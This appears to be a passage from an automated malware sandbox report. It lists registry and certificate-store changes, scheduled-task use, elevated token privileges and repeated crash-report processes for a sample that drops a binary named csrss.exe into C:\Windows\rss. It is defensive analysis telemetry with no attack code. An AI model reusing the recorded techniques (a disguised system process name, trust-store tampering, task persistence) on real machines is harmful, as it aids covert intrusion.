| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Windows\rss\csrss.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 764
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 692
C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe
"C:\Users\Admin\AppData\Local\Temp\6c5db6dce13ded4e0e6c7e9a526b063e.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 340
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 724
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 748
C:\Windows\SysWOW64\WerFault.exe
